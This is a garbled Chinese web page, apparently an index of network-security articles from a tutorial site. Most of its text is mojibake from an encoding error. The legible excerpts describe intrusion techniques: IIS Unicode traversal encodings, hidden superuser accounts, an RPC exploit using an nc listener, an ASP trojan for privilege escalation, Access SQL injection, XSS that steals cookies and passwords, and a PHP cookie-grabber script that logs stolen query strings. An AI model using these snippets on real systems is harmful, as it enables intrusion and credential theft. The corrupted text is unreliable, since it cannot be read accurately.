ÍøÂ簲ȫ - µçÄԽ̳ÌÍø
µ±²ËÄñÓöÉÏü¿ÍÖ®Ë�:ÐÅÏ¢ÇÔÈ¡
ºÚ¿Íͨ¹ýÇ°ÆÚ×¼±¸¹¤×÷ºó£¬¾ÍÒª¿ªÊ¼Îª´ïµ½ËûÃǵÄÄ¿µÄ£¬ÊµÐи÷ÖÖºÚ¿ÍÐÐΪÁË¡£ÇÔÈ¡¶Ô·½¼ÆËã»úÄÚµÄÐÅÏ¢¡ª¡ªÊDZÊÕßÊ×ÏÈҪ̸µ½µÄ£¬Ïȱð˵ËüµÄΣº¦»áÔì³É¶àÉÙ¶àÉٵľ­¼ÃËðʧ£¬¾Í˵ÄãµÄÒþ˽ºÍIDÍâй£¬ÆðÂë²»ÊÇÒ»¼þÖµµÃ¸ßÐ˵ÄÊ¡£ ÇÔÈ¡ÐÅÏ¢ ÇÔÈ¡¶Ô·½¼ÆËã»úÐÅÏ¢Êֶν϶࣬µ«¹é½áÆðÀ´±¾ÖÊÒ»Ñù£º¶¼ÊÇͨ¹ý³ÌÐò£¬Ñ°ÕÒ»ò¼Ç¼ÖÖÖ²£¨³ÌÐò£©Õß
·ÖÀࣺÍøÂ簲ȫ
ÈçºÎ³ÉΪһÃûºÚ¿Í
-------------------------------------------------------------------------------- ÄÚÈÝÒ»ÀÀ Ϊʲô»áÓÐÕâ·ÝÎĵµ£¿ ʲôÊǺڿͣ¿ ºÚ¿ÍÓ¦ÓеÄ̬¶È ºÚ¿ÍµÄ»ù±¾¼¼ÄÜ ºÚ¿ÍÎÄ»¯ÖеĵØλ ºÚ¿ÍºÍÊé´ô×Ó(Nerd)µÄÁªÏµ ·ç¸ñµÄÒâÒå ÆäËü×ÊÔ´ FAQ£¨³£ÎÊÎÊÌâ½â´ð£© ----------------------------------------------------------------
·ÖÀࣺÍøÂ簲ȫ
ÈçºÎ³ÉΪһÃûºÚ¿Í (¶þ)
-------------------------------------------------------------------------------- ºÚ¿ÍµÄ»ù±¾¼¼ÄÜ ºÚ¿Í̬¶ÈÖØÒª£¬µ«¼¼Êõ¸ü¼ÓÖØÒª¡£Ì¬¶ÈÎÞ·¨Ìæ´ú¼¼Êõ£¬ÔÚÄã±»±ðµÄºÚ¿Í³ÆΪºÚ¿Í֮ǰ£¬ÓÐһЩ»ù±¾µÄ¼¼ÊõÄã±ØÐëÕÆÎÕ¡£ ÕâЩ»ù±¾¼¼ÊõËæ×Åм¼ÊõµÄ³öÏÖºÍÀϼ¼ÊõµÄ¹ýʱҲËæʱ¼äÔÚ»ºÂý¸Ä±ä¡£ÀýÈ磬¹ýÈ¥ÄÚÈÝ°üÀ¨Ê¹ÓûúÆ÷ÓïÑÔ±à³Ì£¬
·ÖÀࣺÍøÂ簲ȫ
½£¿ÍÂÛ̳±»ºÚÓë¹Â¶À½£¿Í̸ºÚ¿Í
2003Äê11ÔÂ15ÈÕ(ÐÇÆÚÁù)ÉÏÎç9µã×óÓÒ£¬ÈÔÔÚ˯ÃÎ(Îҵİ®ºÃÖ®Ò»:)ÖеÄÎÒͻȻ±»ÊÖ»úÉù»½ÐÑ£¬Ô­À´ÊÇ¡¶ºÚ¿ÍXµµ°¸¡·µÄÖ÷±àzero¸øÎÒ´òÀ´µÄµç»°£¬ËµÎÒÂÛ̳µÄÒ³Ãæ±»¸ÄÁË£¬°´ÕÕ³£Àí˵£¬ÎÒÓ¦¸ÃºÜ³Ô¾ªµÄ£¬±Ï¾¹ÔÚ¹úÄںܶàÈ˶ÔÎÒµÄÕ¾µã»¢ÊÓíñíñ°¡£¬¼ÇµÃºÜ¶àºÚ¿Í°®ºÃÕßÐÂÊÖ¶ÔÎÒ˵¹ý£º¡°½«À´ÎÒÒ»¶¨Òª´ò°ÜÄã� ±£¬ÎÒÒ»°ã¶¼ÀֺǺǵػش𣺡°ÎÒÏ
·ÖÀࣺÍøÂ簲ȫ
×îºóµÄÕ½ÒÛ£ºÂ©¶´¹¥»÷
©¶´¹¥»÷ ¶Ô΢Èí£¨Microsoft£©¶øÑÔ£¬×î¾ß·í´ÌµÄÊÇ×ܱ»ºÚ¿ÍÏÈ·¢ÏÖ©¶´£¬´ýWindowsÃǵ¹Ïºó£¬Î¢Èí²ÅÕ¾³öÀ´²¹³äÁ½¾ä£º¡°×îеIJ¹¶¡ÒѾ­·¢²¼£¬Èç¹û¿Í»§Ã»Óм°Ê±ÏÂÔز¹¶¡³ÌÐò¶øÔì³ÉµÄºó¹û£¬ÎÒÃǽ«²»³Ðµ£ÔðÈÎ� � ¹¥»÷£º ϸϸÅ̲飬©¶´¹¥»÷Ö÷Òª¼¯ÖÐÔÚϵͳµÄÁ½¸ö²¿·Ö£º1.ϵͳµÄ¶ÔÍâ·þÎñÉÏ£¬Èç¡°³å»÷²¨¡±²¡¶¾Õë¶ÔϵͳµÄ¡°Ô¶³ÌЭÖú¡±
·ÖÀࣺÍøÂ簲ȫ
¹Ø±Õnetbios·þÎñ
Èç¹ûÄãʹÓõÄÊÇ×îÔç°æ±¾µÄWindows95£¬ÄǹرÕNetBIOS¾ÍÊÇÒ»¼þ·Ç³£ÈÝÒ×µÄÊ£ºÕÒµ½ÏµÍ³ÀïÃûΪVnBT.386µÄÎļþ£¬Ëæ±ã½«Ëü¸Ä¸öÃû£¬Èç¸ÄΪVnbt.out£¬Õâ¾ÍËã´ó¹¦¸æ³ÉÁË¡£ Èç¹ûÄãʹÓõÄÊÇWindows95¸Ä½ø°æ¡¢Windows98¡¢Windows98SE»òÊÇWindowsMe,ÄǾÍÒªÉÔ΢Âé·³Ò»µã¡£Ê×ÏÈ£¬´ò¿ª¿ØÖÆÃæ°å£¬½øÈë¡°ÍøÂ硱¶Ô»°´°£¬ÔÚÅäÖñíÖУ¬²é¿´ÁбíÖÐ
·ÖÀࣺÍøÂ簲ȫ
ÍøÂ簲ȫµÄÈô¸ÉÎÊÌâ
1¡¢×·×ÙÓû§µÄIP¡£ÕâÀïµÄIPÊÇÖ¸IPµØÖ·£¬Ò²ÊÇÉÏÍøÓû§µÄΨһÉí·Ý˵Ã÷¡£ÓÉËü¿É»ñµÃÓû§µÄÉÏÍøµç»°¼°ÆäËû×ÊÁÏ¡£ÕâÑù£¬°²È«²¿ÃÅÒ»µ©ÕÆÎÕÄãÉÏÍøµÄIP£¬¾Í·Ç³£ÈÝÒײ鵽ÄãÁË¡£Òª±ÜÃⱩ¶×Ô¼ºµÄIP£¬ÎÒÃÇ¿ÉʹÓð²È«µÄ¡¢¿É±£ÃܵĴúÀí·þÎñÆ÷¡£ 2¡¢ÀûÓÃCOOKIE¡£°²È«²¿ÃÅÁíÍâÒ»ÖÖ³£Óõļà¿ØÊÖ¶ÎÊÇÀûÓÃÉÏÍøÓû§µçÄÔÖеÄCOOKIE¡£ËùνCookie
·ÖÀࣺÍøÂ簲ȫ
´ÓÒ»´ÎÉø͸²âÊÔ̸Æð
Ò»Éø͸µÄ¾ßÌå¹ý³Ì ÅóÓÑ×öÁËÒ»¸ö²ÆÎñ²¿ÃŵÄÏîÄ¿£¬½ñÌì½ÐÎÒÀ´×öÃâ·ÑµÄÉø͸²âÊÔ£¬ÏÂÃæÀ´Ì¸Ì¸Õ⠴εĹý³ÌºÍÌå»á¡£ ÏÈÀ´½éÉÜÒ»ÏÂ×Ó·þÎñÆ÷µÄ»ù±¾Çé¿ö£¬windows2000advserverÖÐÎİ棬¾Ý³Æ ´ò¹ýÁËsp3£¬ASP+iis+MSSQL¡£Ê×ÏÈɨÃèÁËÒ»ÏÂ×Ӷ˿ڣ¬ºÇºÇ£¬¿ªÊ¼µÄÒ»°ã²½Öè¡£ ¶Ë¿Ú21¿ª·Å:FTP(Control) ¶Ë¿Ú80¿ª·Å:HTTP,WorldWideWeb ¶Ë¿Ú135
·ÖÀࣺÍøÂ簲ȫ
UNICODE©¶´µÄÔ­Àí
Ò»¡¢UNICODE©¶´µÄÔ­Àí ´Ë©¶´´ÓÖÐÎÄIIS4.0+SP6¿ªÊ¼£¬»¹Ó°ÏìÖÐÎÄWIN2000+IIS5.0¡¢ÖÐÎÄWIN2000+IIS5.0+SP1£¬ ̨Íå·±ÌåÖÐÎÄҲͬÑù´æÔÚÕâÑùµÄ©¶´¡£ ÖÐÎÄ°æµÄWIN2000ÖУ¬UNICODE±àÂë´æÔÚBUG£¬ÔÚUNICODE±àÂëÖÐ %c1%1c-¡µ(0xc1-0xc0)*0x40+0x1c=0x5c=¡®/¡® %c0%2f-¡µ(0xc0-0xc0)*0x40+0x2f=0x2f=¡®\¡® ÔÚNT4ÖÐ/±àÂëΪ%c1%9c ÔÚÓ¢
·ÖÀࣺÍøÂ簲ȫ
½¨Á¢Òþ²ØµÄ³¬¼¶Óû§
Ç°¼¸ÌìÔÚij¸öÍøÕ¾(¼Ç²»ÇåÁË£¬²»ºÃÒâ˼^_*£©ÉÏ¿´µ½ÁËһƪ½éÉÜÈçºÎ½¨Á¢Òþ²ØµÄ³¬¼¶Óû§µÄͼÎĽ̳̣¬¸øÎÒÁ˺ܴóµÄÆô·¢£¬×÷Õßֻ˵Ã÷ÁËÈçºÎÔÚ±¾µØͼÐνçÃæϽ¨Á¢Òþ²ØµÄ³¬¼¶Óû§£¬ÇÒ×÷Õß˵ËûÎÞ·¨ÔÚÃüÁîÐÐÏÂʵÏÖÒþ²ØµÄ³¬¼¶Óû§µÄ½¨Á¢£¬ÓÚÊÇÎҾͿªÊ¼×ÔÒÑÃþË÷£¬¸Õ¿ªÊ¼Ê±£¬ÎÒÓÃreg.exe£¨3.0°æ)×÷ΪÃüÁîÐÐϵ¼³öµ¼Èë×¢²á±íÎļþµÄ¹¤¾ß£¬
·ÖÀࣺÍøÂ簲ȫ
TelnetµÄ¹¥»÷
Ëùν¶ÔtelnetµÄ¹¥»÷Ò²²»Íâºõ¶ÔtelnetµÄÓû§²Â½âºÍ¶Ôtelnet·þÎñ½ø³ÌµÄÒç³ö£¬³ýÁËÕâЩ£¬±¾È˾õµÃtelnet²¢Ã»ÓÐÌ«´óµÄÎÊÌâ.telnetµÄÁ¬½Ó²¢²»ÊÇ´ó¼ÒÏëÏóµÄÄÇô¼òµ¥ÁË£¬ËäȻûÓÐÏñsshÄÇÑù½øÐмÓÃÜ£¬²»¹ý£¬»¹ÊDZÈFTPµÈͨѶÀ´µÄ¸´ÔÓ¡£ D:telnet192.168.25.1 RedHatLinuxrelease7.3(Valhalla) Kernel2.4.18-3onani686 login:chi Pass
·ÖÀࣺÍøÂ簲ȫ
aspľÂíÅäºÏservuÈ¡µÃ¹ÜÀíԱȨÏÞ
½ñÌìÐÄÇé²»ºÃ£¬Ð´Ò»ÆªÎÄÕÂÍæÍæ°É£¬ÀûÓÃÍøÕ¾µÄÅäÖôíÎóÅäºÏserv£­uÈ¡µÃ¹ÜÀíԱȨÏÞ£¬¼òµ¥Ò»µã¾ÍÊÇͨ¹ýASPľÂíÅäºÏserv£­uÈ¡µÃ¹ÜÀíԱȨÏÞ£¬¹þ¹þ¹þ£¬ÊDz»ÊǺÜcool°¢! £­£­£­£­£­£­£­£­£­£­£­£­ÎÄÕ¿ªÊ¼£­£­£­£­£­£­£­£­£­£­£­£­ ΪÁËÕÒ²ÖľÂéÒµÄmp3£¨Õâ¸öС¹ÃÄïµÄ¸èºÜºÃÌý°¢£©£¬°Ñ°ë¸ö»¥ÁªÍø¶¼ËÑÍêÁË£¨Ì«¿äÕÅÁË°Ñ)£¬¾ÍÊÇÕÒ²»µ½
·ÖÀࣺÍøÂ簲ȫ
ASPÍøÂ簲ȫ
ASPÍøÂ簲ȫ£º һǰÑÔ MicrosoftActiveServerPages£¨ASP£©ÊÇ·þÎñÆ÷¶Ë½Å±¾±àд»·¾³£¬Ê¹ÓÃËü¿ÉÒÔ´´½¨ºÍÔËÐж¯Ì¬¡¢½»»¥µÄWeb·þÎñÆ÷Ó¦ÓóÌÐò¡£Ê¹ÓÃASP¿ÉÒÔ×éºÏHtmlÒ³¡¢½Å±¾ÃüÁîºÍActiveX×é¼þÒÔ´´½¨½»»¥µÄWebÒ³ºÍ»ùÓÚWebµÄ¹¦ÄÜÇ¿´óµÄÓ¦ÓóÌÐò¡£ÏÖÔںܶàÍøÕ¾ÌرðÊǵç×ÓÉÌÎñ·½ÃæµÄÍøÕ¾£¬ÔÚǰ̨ÉÏ´ó¶¼ÓÃASPÀ´ÊµÏÖ¡£ÒÔÖÁÓÚÏÖÔÚASPÔÚ
·ÖÀࣺÍøÂ簲ȫ
½ðɽ¶¾°Ô6µÄÈý¸öÌØÊâÓ¦ÓÃ
½ðɽ¶¾°Ô6³ýÁ˾ßÓг¬Ç¿ÐÔÄܵIJéɱºÍ·ÀÓù²¡¶¾Í⣬»¹¾ßÓÐһЩÌØÊâµÄÓ¦Óá£Èç¹ûÓû§Äܹ»ºÜÊìÁ·µØʹÓÃÕâЩÌØÊâ¶øʵÓõŦÄÜ£¬ÔÚһЩÌØÊâʱºò¾Í¿ÉÒÔ´ó´ó·½±ãÎÒÃǵĵçÄÔ²Ù×÷¡£ Ò»¡¢ÐÞ¸´EXEµÄÎļþ¹ØÁª ½ðɽ¶¾°Ô6ÿ´ÎÆô¶¯Ê±¶¼»á×Ô¶¯¼ì²é×¢²á±íÖеÄEXEĬÈÏÎļþ¹ØÁªÊÇ·ñÕýÈ·£¬Èç¹ûEXEÎļþ¹ØÁª²»ÊÇϵͳĬÈϵÄÉèÖã¬Ôò½ðɽ¶¾°Ô6»á×Ô¶¯½«
·ÖÀࣺÍøÂ簲ȫ
ͼÎĽ̳ÌÈÃÄãµÄ»ú¸ü°²È«
ͼÎĽ̳̣¬ÈÃÄãµÄÈâ»ú¸ü°²È« ºÇºÇ£¬×ÜÓÐÈËÏòÎÒ·´Ó¦ËµËûÃǵÄÈâ»ú¸øÈ˺ÚÁË ºÃ²Ò£¬ÒòΪËûÃÇÒ»°ãÊÇÀûÓÃÈõ¿ÚÁî½øÈ¥µÄ ÄÇô£¬±ðÈËÒ»¶¨Ò²ÄÜÀûÓÃÈõ¿ÚÁî½øÀ´°¡£¬ËùÒÔ£¬Òª¹¹Ôìһ̨°²È«µÄÈâ»úÊDZØÒªµÄ£¡ ½ñÌìÀÛ£¬ÏÈ×¥¼¸ÕÅͼ£¬²»¶à£¬ÒÔºóÔÙ²¹³ä£¡ Ê×ÏÈ£¬ÎÒÃǵ±È»Òª½øµ½·þÎñÀȥ¿´¿´ÓÐʲôΣÏÕµÄϵͳ½ø³ÌÔÚ¿ª×ÅÀ² ºÃ£¬ÕÒµ½Ò»¸ö¡£¿´×Å×¢
·ÖÀࣺÍøÂ簲ȫ
rpc©¶´µÄÀûÓÃ
sunx³öµÄÄǸö³ÌÐò³É¹¦ÂÊ»¹²»´í ûÓùýµÄÈ¥sunx.orgÏÂÔØ°É ¼òҪ˵һÏÂÓ÷¨£¨¸øûÓùýµÄ¿´µÄ£© Ê×ÏÈÄÃsuperscanȥɨ3268¶Ë¿Ú£¬ÒòΪÕâÊÇÓò¿ØÖÆÆ÷µÄ±êÖ¾ Õâ¸ö©¶´Ö»¶ÔÓò¿ØÖÆÆ÷ÓÐЧ ɨµ½ÕâÑùµÄ»úÆ÷ÒÔºó£¬ÓÃncÔÚ±¾µØ¼àÌýÒ»¸ö¶Ë¿Ú ÎÒÊÇÄÚÍø£¬Ö»ºÃÔÚÈ⼦ÉϼàÌýÁË ÏÂÃæÊÇÔÚÈ⼦ÉÏ~nn.jpg¾ÍÊÇÎÒ·ÅÉÏÈ¥µÄnc 218.0.0.0´ú±íÄ¿±ê»ú 123.12
·ÖÀࣺÍøÂ簲ȫ
LB5KÂÛ̳setskin.cgi´æÔÚ¹ÜÀíÔ±ÑéÖ¤¿ÉÈÆ¿ªÂ©¶´
DedicatedThisScrapToCaoJing Éæ¼°°æ±¾£º LB5000XPËùÓа汾£¬µÍÓÚLB5000MX1.90£¨1.90ÒÑÐÞ¸´£©ËùÓа汾 ÃèÊö£º LBÊÇÒ»¿îÓÉwww.leoboard.com¿ª·¢ºÍά»¤µÄÔ´´úÂ뿪·ÅµÄcgiÂÛ̳£»ÓÉÓÚsetSKIN.cgi´æÔÚ¹ÜÀíÔ±ÑéÖ¤¿ÉÈÆ¿ªÂ©¶´£¬¿ÉÄܵ¼Ö·Ƿ¨Óû§¿ØÖÆÂÛ̳»òÒÔwebȨÏÞÔÚϵͳÉÏÖ´ÐÐÈÎÒâÃüÁî ¾ßÌ壺 LBÂÛ̳¹ÜÀí²Ëµ¥ÖÐÓиö¡°¹ÜÀíÇø²å¼þÉè
·ÖÀࣺÍøÂ簲ȫ
Õ¥¸É¶¾°Ô×îºóÒ»µÎÓÍ
¾ÝȨÍþ»ú¹¹Í³¼Æ£¬Ò»¸öÈí¼þÖ»ÓÐ30£¥×óÓҵŦÄܱ»ÀûÓ㬸ü¶àµÄÔòÎÞÈËÎʽò£¬É±¶¾Èí¼þÓÈΪÈç´Ë£¬Ã¿Ìì³ýÁËËæ»úÆô¶¯£¬ÍùÍùÖ»ÓгöÏÖ²¡¶¾Ìáʾ£¬Óû§²ÅÒâʶµ½ËüµÄ´æÔÚ¡£ÆäʵÿÖÖɱ¶¾Èí¼þ³ýÁ˱ر¸µÄ²é¶¾¡¢É±¶¾¡¢·À»ðǽÒÔÍ⣬»¹´øÓÐÐí¶à¸½¼Ó¹¦ÄÜ£¬Ö»Óгä·ÖÀûÓúÃÕâЩ¹¦ÄÜ£¬²ÅÄÜʹÄãµÄϵͳ¸ü¼Ó°²È«£¬²¢ÄÜΪÄãÅųýÐí¶à¹ÊÕÏ¡£ÏÂÃæÎÒÃǾÍÍÚ
·ÖÀࣺÍøÂ簲ȫ
´Ó±à³Ìµ½ÈëÇÖ
´ó¼ÒÊDz»ÊÇ´ó¶¼Ê¹ÓñðÈ˵Ť¾ßÀ´¸ãÈëÇÖÄØ£¬ÎÒÒ²ÊÇ£¬²»¹ý´ÓѧÁ˱à³ÌÒÔºó£¬ÀÏÊÇÏë×Ô¼ºÐ´µã³ÌÐò£¬È»ºóÓÃËüÀ´ÈëÇÖ£¬ÕâÀï¾ÍÊǽÌÄãÈçºÎʵÏÖ×Ô¼ºµÄµÄÃÎÏë¡£ ½ñÌìËùÒªÑÝʾµÄÊÇtelnetµÄÈëÇÖ£¬½üÀ´µÄsunos_telnet¸ãµÄ·ç·ç»ð»ð. 1.ɨÃèÒ»¸öIP¶Î£¬ËùÒÔҪд¸öIPɨÃèÆ÷ 2.Telnetbannercheck,¿´telnetµÄ·´Ó¦,ËùÒÔҪд¸ösystemoscheckdepent
·ÖÀࣺÍøÂ簲ȫ
´ÓÃüÁîÌáʾ·ûÖ´ÐÐ IIS ÖеĹÜÀíÈÎÎñ
±¾ÎĽéÉÜÈçºÎ´ÓÃüÁîÌáʾ·ûÖ´ÐÐInternetÐÅÏ¢·þÎñ(IIS)ÖеĹÜÀíÈÎÎñ¡£Óм¸ÖÖ¹¤¾ß¿ÉÒÔ°ïÖú¹ÜÀíÈÎÎñµÄÖ´ÐС£±¾ÎÄÖУ¬ÕâЩÈÎÎñ»®·ÖΪÈý¸ö¶ÀÁ¢µÄÈÎÎñ×飻²»¹ý£¬ËùÓÐÈÎÎñ¶¼ÊÇÓÉÇý¶¯Æ÷ÅÌ·û:\Inetpub\AdminScriptsÎļþ¼ÐÖÐAdministrator×éµÄ×é³ÉÔ±Óû§Ö´Ðеġ£ ±¸×¢£ºÒª´ò¿ªÃüÁîÌáʾ·ûÒÔÖ´Ðб¾ÎĽéÉܵÄÈκÎÈÎÎñ£¬Çë°´ÏÂÁв½Öè²Ù×÷£º
·ÖÀࣺÍøÂ簲ȫ
Éø͸¹¥»÷±ØÓÃÃüÁîÓë²½Öè
¼ÙÉèÏë¹¥»÷µÄÖ÷»úIPÊÇ:61.139.1.79 ͬһ×ÓÍøÏÂÎÒÃÇÒÑÓÐȨÏÞµÄÖ÷»úIPÊÇ:61.139.1.88²¢¿ÉÒÔ3389µÇ½ µÚÒ»²½: tracert61.139.1.1 C:\WIN2000\system32tracert61.139.1.1 TracingroutetoHACK-4FJ7EARC[61.139.1.1] overamaximumof30hops: 110ms10ms10msHACK-4FJ7EARC[61.139.1.1] Tracecomplete. Õâ¾Í˵Ã÷ÁËÄãÏë¹¥»÷µÄÖ÷»úºÍÄã
·ÖÀࣺÍøÂ簲ȫ
¶Ë¿ÚÏê½â£¨2£©-¶Ë¿ÚµÄ·ÖÀà
¶Ë¿Ú¿É·ÖΪ3´óÀࣺ 1£©¹«È϶˿ڣ¨Well Known Ports£©£º´Ó0µ½1023£¬ËüÃǽôÃÜ°ó¶¨ÓÚһЩ·þÎñ¡£Í¨³£ÕâЩ¶Ë¿ÚµÄͨѶÃ÷È·±íÃ÷ÁËijÖÖ·þÎñµÄЭÒé¡£ÀýÈ磺80¶Ë¿Úʵ¼ÊÉÏ×ÜÊÇHTTPͨѶ¡£ 2£©×¢²á¶Ë¿Ú£¨Registered Ports£©£º´Ó1024µ½49151¡£ËüÃÇËÉÉ¢µØ°ó¶¨ÓÚһЩ·þÎñ¡£Ò²¾ÍÊÇ˵ÓÐÐí¶à·þÎñ°ó¶¨ÓÚÕâЩ¶Ë¿Ú£¬ÕâЩ¶Ë¿ÚͬÑùÓÃÓÚÐí¶àÆäËüÄ¿µÄ
·ÖÀࣺÍøÂ簲ȫ
û¿ªIPC$Ö÷»úÉÏ´«ÏÂÔØ˼·
±ÈÈçÓÃÒç³ö¹¥»÷µÃµ½È¨ÏÞ·¢ÏÖûÓпª139or445ÎÒÃÇ¿ÉÒÔ´ÓÄÚ²¿makeit±ÀÀ££º 1.netshareipc$ ÀýÈ磬ʹÓÃwebdavÒç³öµÃµ½systemnetshare¿´Ò»ÏÂûÓÐÈκζ«Î÷ÓÃʲô¶«Î÷¶¼Á¬²»ÉÏËùÒÔÒªÏÈ´ò¿ªipc$¡ª¡ªnetshareipc$ ʣϵÄÄãÔ¸ÒâʹÓÃʲô¾Í¿ÉÒÔÁË£¬±ÈÈçdameware. 2.tFTP.exe »ñµÃsa¿Õ¿ÚÁʹÓÃsqlexecÁ´½Ó£¬Ö»¿ªÁË80ºÍ1433Ôõô°ì£¿±ð
·ÖÀࣺÍøÂ簲ȫ
Sql Injection with Access
DedicatedThisScrapToCaoJing ºÜ¶àÅóÓÑÔÚAccessϽøÐÐSQL×¢Èë¹¥»÷µÄʱºò£¬×ܻᱧԹ£ºACCESS¹¦ÄÜÌ«ÈõÁË£¬Ã»ÓÐ×¢ÊÍ·û¡¢²»Ö§³Ö¶àÓï¾ä²éѯ...ÁíÒ»·½Ã棬ºÜ¶à³ÌÐòÔ±ÔÚʹÓÃACCESS×öÊý¾Ý¿âд³ÌÐòʱ£¬ÍùÍùÖ»¶ÔÄÇЩ¶ÔÃô¸Ð±íµÄ²Ù×÷´úÂëÖ´ÐÐÑϸñÉó²é£¬¶øÆäËûһЩ±íµÄ²Ù×÷´úÂë¾ÍºÜ´Ö²ÚÁË¡£ÕâÖ»ÄÜ˵ÎÒÃǶÔACCESSÁ˽âÌ«ÉÙÁË£¬Ç°²»¾ÃÎÒÓÐÐÒ
·ÖÀࣺÍøÂ簲ȫ
ÍêÃÀµÄ½â¾ö¿çÕ¾½Å±¾µ¯¿ò¿ò
ÍêÃÀµÄ½â¾ö¿çÕ¾½Å±¾µÃCOOKIEµ¯¿ò¿òµÄÎÊÌâ ͬʱ°ÑÃÜÂëÓû§Ãû·¢µ½ÄãÔÚÂÛ̳µÄÓÊÏàÀˬ°É ÏÈÍ·¿´µ½ÓûÍûÖ®ÒíµÄself.windowµÄ°ì·¨ ÆäʵÎÒÒ»Ö±Óиö´ÓÀ´Ã»¸øÈκÎÈË˵µÄ°ì·¨: ÍæÁ˺þÃÁ˹«²¼Á˺ǺÇ: Html scriptlanguage=vbs subchangeq() ifform1.loc.value=""orform1.who.value=""then msgbox"ûÓмÓÈëµØÖ·»òÓû§Ãû?" exitsub en
·ÖÀࣺÍøÂ簲ȫ
SMBRELAYÖÕ¼«Ó¦ÓÃ
˵Ã÷£º£ºÕâ´Î¹¥»÷¹ý³ÌÖ»ÐèÒª2̨»úÆ÷£¬3¸öIPµØÖ· ¹ØÓÚЭÒéÓëIPÎÊÌâµÄ˵Ã÷£º ÎÒµÄIPÊÇ218.197.248.212£¬¿ÉÊÇSMBRELAYÎÞ·¨ÔËÐÐÔÚÕâ¸öIPÉÏ£¬¶øÇÒÎÒÖ»ÓаÑ×Ô¼º»úÆ÷ÉÏ¡°´òÓ¡»úÓëÎļþ¹²Ïí¡±·þÎñɾ³ýºó²ÅÄܽÓÊÜÄ¿±ê»úÆ÷´«À´µÄHASH£¬218.197.248.154ÊÇÒ»¸ö²»´æÔÚµÄIPµØÖ·£¬ËùÒÔÎÒ°ÑSMBRELAY°óÔÚ218.197.248.154ÉÏ£¬²âÊÔµÄʱºò£¬Êµ¼Ê
·ÖÀࣺÍøÂ簲ȫ
Opera 7 Îå¸öDos©¶´
ÂÛ̳µÇ½Ãû:joker Ìá½»ÕßÓʼþµØÖ·:[email protected] Ìá½»ÕßQQºÅÂë: ±êÌâ:Opera7Îå¸öDos©¶´ °æȨ£ºÎÄÕÂÊôÖлª°²È«Íøhttp://www.safechina.netºÍ×÷Õß¹²Í¬ËùÓУ¬×ªÔØÇë×¢Ã÷³ö´¦£¡£¡ ÄÚÈÝ: -=Fastestbrowseronearth,Fastestcrashonearthtoo=- PRODUCT:OperaforWindows VERSIONS:7.11bbuild2887 7.11build2880 7.10build2840
·ÖÀࣺÍøÂ簲ȫ
»ñÈ¡cookieµÄÔ´´úÂë
ÒÔÏÂÊÇ»ñÈ¡cookieµÄPHPÔ´´úÂ룺 ?php $info=getenv("QUERY_STRING"); if($info){ $fp=fopen("test.txt","a"); fwrite($fp,$info."\n"); fclose($fp); } ? scriptlanguage=vbscript document.location="http://my.51.net/bbs/" /script Èç¹ûµÃµ½cookie,ÔòÔÚ¿Õ¼äÖÐÉú³Étest.txt£¬ÎªÁ˲»ÒýÆð»³ÒÉ£¬½«×Ô¶¯°ÑÍøҳת»»µ½http://xi
·ÖÀࣺÍøÂ簲ȫ
¶Ô¹úÄÚÁ÷ÐеÄÈý´ótelnetÀ©Õ¹ºóÃųÌÐòµÄ±È½Ï
ÏÖÔÚÁ÷ÐеÄtelnetÀ©Õ¹ºóÃÅÖ÷ÒªÓÐÈý¸ö:winshell,wollfºÍwineggdropshell,Èý¸öºóÃŶ¼ÊÇÒÔw¿ªÍ·£¬²»ÖªµÀÊDz»ÊÇÇɺϡ£ÒÔÏÂÎÒ»áÏêϸ¶ÔÕâÈý¸öºóÃÅ×÷¹¦ÄÜ£¬´óС£¬Îȶ¨ÐÔ£¬ÓÅȱµã,°²È«ÉϵıȽϡ£ winshell×îа汾ÊÇ5.0,Ó¦¸ÃÊDz»»áÓÐÔÙеİ汾µÄÁË¡£ wollf×îа汾ÊÇ1.6,ºÜ¾Ã¶¼Ã»ÓÐÉý¼¶¹ýÁË£¬ºÜÓпÉÄܲ»ÔÙÓÐеİ汾¡£ wineggdrops
·ÖÀࣺÍøÂ簲ȫ
ÐÂBBSXP©¶´[µ¹×Å¿´Èý]
×îÐÂBBSXP©¶´[µ¹×Å¿´Èý] ÆäʵÌÉÔÚ´²ÉÏ¿´´úÂëÒ²ÊÇÒ»¼þ·Ç³£ã«ÒâµÄÊÂÇ飬ÌرðÊÇ¿´ÄÇЩдµÃºÜÀõĶ«Î÷ʱºò£¬ Äã×ÜĪÃûÆäÃîµØ²úÉúÒ»ÖÖ¾Ó¸ßÁÙϵĸоõ¡£ÔÚ¹ýÁËÒ»¸öÍ´¿à²»¿°µÄÊî¼Ùºó£¬ÓÈÆäÊÇÔÚÉú²¡ ºó¼±ÐèÒªµ÷ÕûÐÄÇéµÄÄǶÎʱ¼äÀ¿´BBSXP¼¸ºõ³ÉÁËÎÒΨһµÄÏíÊÜ¡£ ÒÀÈ»ÊÇBBSXP1.65a£¬ÒÀÈ»ÊÇÒµÓ༶±ðµÄ´úÂëºÍ¶´¡£ recycle.ASPÐÐ16¡¢
·ÖÀࣺÍøÂ簲ȫ
<<¡¡67¡¡66¡¡65¡¡64¡¡63¡¡62¡¡61¡¡60¡¡59¡¡58¡¡57¡¡>>¡¡